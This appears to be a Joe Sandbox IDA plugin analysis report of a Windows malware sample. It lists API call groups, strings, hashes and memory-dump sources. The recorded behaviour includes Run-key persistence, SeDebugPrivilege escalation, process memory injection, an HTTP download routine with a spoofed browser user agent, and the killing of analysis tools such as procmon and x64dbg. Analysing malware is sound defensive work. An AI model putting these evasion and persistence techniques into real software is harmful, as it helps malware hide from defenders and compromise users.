                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                          • API String ID: 779948276-1428018034
                                                                                                                                                                                                                          • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction ID: fe56093c04b1eb0ecefe6b5acd3209b117b20bdc437ba03f0be79d527c11df90
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E115432518A4186E7609F25F480A2AB7A0F7847A0F509330F9AE43BA8DF6CD094CB10

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 422 7ff794831050-7ff79483108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2574300362-0
                                                                                                                                                                                                                          • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction ID: 1c12e93357fdfd5e6f4036f8a9c738ffc601b2d0365132bf737aa98445d39464
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7E09276508F8486C660AF15F89001AB7B4FBC8794F908125EACD43B28DF3CC165CB00

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 423 7ff794833b24-7ff794833b33 424 7ff794833b48-7ff794833b4c 423->424 425 7ff794833b35-7ff794833b42 VirtualFree 423->425 425->424
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction ID: 9fd845eb7110d8bdd5a3d120b7e80a785b9b9eca0879ba372d36af13753755ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DD0C921E3898281E7A4AB27E889B19A2A0FBC4B44F80C035E68942564CE3CC4A9CB00

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 426 7ff794833b54-7ff794833b7a VirtualAlloc
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                                                                          • Instruction ID: 8860ded7473fce8a825a901adac9b0620098545ea3479f281618adf06ad1a223
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90C080B1F25140C3D71DDF32E491F0F6A10B744740F90C028DA0147744C93DC5518F00
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF794831D19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                          • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                          • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction ID: 0823c0857c02d9770c2879f9c2bf4104920c9c54649cd6d37448c2dd34884fae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B471FA32518A8182E760EF66F494B2AF760FBC4B94F909035FA8E43A68DF7CD454CB50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                                          • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                          • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction ID: 121184506f2a9b5cc337971afa69e373a14ee45b59ca0fae3e2b95b9fbd49038
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47415E32618A8186E770DF62F484B6EF7A0FB84B54F908135EA8947A98DF7DD458CF10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 4073123320-2766056989
                                                                                                                                                                                                                          • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction ID: 9735732029ac5bfb8dc555254883e28cdcf1f02f4ac490e4899bb19f6cc1339a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4641B332A08B8586E770DF26F49476AB7A0F784B84F508125EACD83B98DF7DE454CB40
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2850635065-0
                                                                                                                                                                                                                          • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction ID: 7d2b34d4bcf7a111ccfc8ebf4ec6a1aed911b25f6cb60f7d88c677f11a31b45e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07110371A0C68681EBB0AF36E4D876AA3A0FB84B54F808335D69D43698DF3DD514DB10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Version
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                                                                          • Opcode ID: a034898b75751d47565587f8f48239afe675d10d53b418dd8b899e915f47bf55
                                                                                                                                                                                                                          • Instruction ID: 00b37a10ff2e3b4db42dd1b57a96fb2f4b7c3d9971e5289449404875d4515a3b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a034898b75751d47565587f8f48239afe675d10d53b418dd8b899e915f47bf55
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1F0AF3190C14382EE759F63E188779A3E0AB69759FC04135D28C03594DA3DD568CF26
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2693768547-0
                                                                                                                                                                                                                          • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction ID: 7d5b8ef0eac1e66450e653064f49765d59d03f61bbebf8036432faa6da5e88bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2481ED32608B8182EA60DF66F48476AE7A0FBC9B95F508135EE8D83768DF7CD454CB10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948345C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833117), ref: 00007FF79483460C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948345C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833117), ref: 00007FF794834649
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948345C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833117), ref: 00007FF794834654
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79483311C), ref: 00007FF794833BC7
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833B84: RegSetValueExW.ADVAPI32 ref: 00007FF794833BFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833B84: RegCloseKey.ADVAPI32 ref: 00007FF794833C0C
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF794833C3C
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF794833E37
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: Process32FirstW.KERNEL32 ref: 00007FF794833E6A
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: CloseHandle.KERNEL32 ref: 00007FF794833E7C
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: wcscmp.MSVCRT ref: 00007FF794833E91
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: OpenProcess.KERNEL32 ref: 00007FF794833EA7
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: TerminateProcess.KERNEL32 ref: 00007FF794833ECA
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: CloseHandle.KERNEL32 ref: 00007FF794833ED8
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: Process32NextW.KERNEL32 ref: 00007FF794833EEB
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: CloseHandle.KERNEL32 ref: 00007FF794833EFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948339B4: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF794833B0C), ref: 00007FF7948339E4
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 00007FF7948331C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                          • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                          • API String ID: 2853470409-928700279
                                                                                                                                                                                                                          • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction ID: bee3bf102bc6823edd35177ba14cdd808383d1a6b1c6c570d45e083ff8ced88b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25216371E1854790EA34BF7AD8D19B4E260AF50754FD0C131E41DA35A69F2CE969C720
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID: rbNSpGEsyb
                                                                                                                                                                                                                          • API String ID: 299056699-189039185
                                                                                                                                                                                                                          • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction ID: 7d1a3dd6611212d7252c531231591f0ea5427286d447e7fe0d5fc92f1dda5a78
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6701E932A0CA4181E730AF36E894669A760FB88B94F848131E94E43664DF3CD5A5D610
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1083639309-0
                                                                                                                                                                                                                          • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction ID: a4c50f70ce303c9e62e0942ddee9565e4d1e92a8bfccc395c3819afd75b103ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC21E231A0CA8681E770AF26E8C876AE360FBC4B54F80C235D95E475A8DF3DD455DB10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 299056699-0
                                                                                                                                                                                                                          • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                                          • Instruction ID: 5247a7b7f37257ad3f53cef33d592bc78de309f97e05bacc020425ade0f50ece
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0201C83691CA4682E730AF36E88466DA370FBC8B85FC0C135ED8E83664DE2CD964C610
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                                                          • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                          • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction ID: 3a76b65ea05a525df01e4f22529c6fad22828ed0934dac75b5fc7ca9a86c3470
